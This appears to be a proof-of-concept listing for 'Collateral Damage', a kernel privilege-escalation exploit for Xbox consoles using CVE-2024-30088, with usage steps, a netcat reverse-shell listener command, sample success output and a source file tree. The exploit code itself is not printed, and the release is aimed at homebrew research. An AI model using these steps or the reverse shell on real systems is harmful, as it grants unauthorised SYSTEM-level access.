Microsoft Windows Kernel 安全漏洞
描述:Microsoft Windows Kernel是美国微软(Microsoft)公司的Windows操作系统的内核。 Microsoft Windows Kernel 存在安全漏洞。以下产品和版本受到影响:Windows Server 2022, 23H2 Edition (Server Core installation),Windows 10 for 32-bit Systems,Windows 10 for x64-based Systems,Windows 10 Version 1607 for
Kernel exploit for Xbox SystemOS using CVE-2024-30088
# Collateral Damage
Collateral Damage is a kernel exploit for Xbox SystemOS using [CVE-2024-30088](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30088).
It targets Xbox One and Xbox Series consoles running kernel versions 25398.4478, 25398.4908, and 25398.4909. The initial entrypoint is via the Game Script UWP application.
This exploit was developed by [Emma Kirkpatrick](https://x.com/carrot_c4k3) (vulnerability discovery & exploitation) and [Lander Brandt](https://x.com/landaire) ([PE loader](https://github.com/exploits-forsale/solstice) development)
## Important Caveats
This initial release is largely intended for developers. Currently a way to place files into the `LocalState` directory of Game Script is required via an app such as [Adv File Explorer (FullTrust)](https://apps.microsoft.com/detail/9nbnjpsxfsqb).
This is due to the requirement of placing the `stage2.bin` and `run.exe` files onto into the `LocalState` directory. In the near future a payload will be supplied which will load those files over the network, so the initial payload will simply be
a script which can be inputted via a USB keyboard emulator.
The reverse shell example provided here requires that your console is connected to a network. When connecting your console to a network be very careful to avoid connecting to the internet and updating. Try to block connectivity to Xbox LIVE as
much as possible, at the very least by setting your DNS to invalid servers.
This exploit is not fully reliable. It relies on a CPU side channel as well as a race condition, both of which have the potential to fail. In the event of a failure, the exploit may alert you that it has failed via network output, or the console itself may crash and reboot.
## Usage
- Modify line 7 of `gamescript_autosave.txt` to contain the local IP of your PC.
- Copy `gamescript_autosave.txt`, `stage2.bin`, and `run.exe` to the `LocalState` directory of the Game Script application on your Console (`Q:\Users\UserMgr0\AppData\Local\Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState\`)
- Listen on port 7070 on your PC using netcat or a similar tool (command example: `nc64.exe -lvnp 7070`)
- Open the Game Script application on your console and select "Show Code Run window" and click "Run code once"
- If the exploit is success you should see output on your PC that resembles the following:
listening on [any] 7070 ...
connect to [] from (UNKNOWN) [] 49665
Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)
Build number: 25398.4478
Attempting to find kernel base...
Found likely kernel base: FFFFF80AF9800000
Attempting exploit...
Exploit succeeded! Running payload!
Microsoft Windows [Version 10.0.25398.4478]
Copyright (c) Microsoft Corporation. All rights reserved.
## Experimentation
Lots of additional work is needed to bring this to the point of being a user-friendly tool for loading homebrew onto the Xbox, but I hope that this provides a good starting point :) If you would like to play around with running code as SYSTEM you can put your code in the `post_exploit` function in `post_exploit.c`.
## Further Work
There is lots more to do on this, but as the kernel part is done I wanted to share it with the community so developers could start poking around with SYSTEM privileges. Here are a few things that I am still hoping to add in the future:
- Side loading support
- Unsigned non-UWP process launching
- SSH support
Additional ideas are welcome :)
## Thanks
thank you to everyone who helped me brainstorm and shared their knowledge and time with me throughout this!!! some of those who i would like to show appreciation to:
- chompie
- tuxuser
- baw
- [Xbox One Research](https://xboxoneresearch.github.io/)
- XBOX-SCENE Discord
[4.0K] /data/pocs/53b92b82a609fe216bf3347abf92cab6b6d398da
├── [4.0K] collat_payload
│ ├── [ 15K] collat_payload.c
│ ├── [7.3K] collat_payload.vcxproj
│ ├── [1.8K] collat_payload.vcxproj.filters
│ ├── [2.4K] ioring.h
│ ├── [9.9K] ioring_lpe.c
│ ├── [ 510] nt_offsets.c
│ ├── [ 436] nt_offsets.h
│ ├── [ 632] post_exploit.c
│ ├── [ 118] post_exploit.h
│ ├── [1.3K] prefetch_asm.asm
│ └── [ 11K] win_defs.h
├── [1.4K] collat_payload.sln
├── [1.0K] LICENSE
├── [ 166] ntdll.def
├── [1.6K] ntdll.exp
├── [3.0K] ntdll.lib
├── [3.7K] README.md
└── [4.0K] solstice_artifacts
├── [ 15K] gamescript_autosave.txt
└── [5.5K] stage2.bin
2 directories, 19 files
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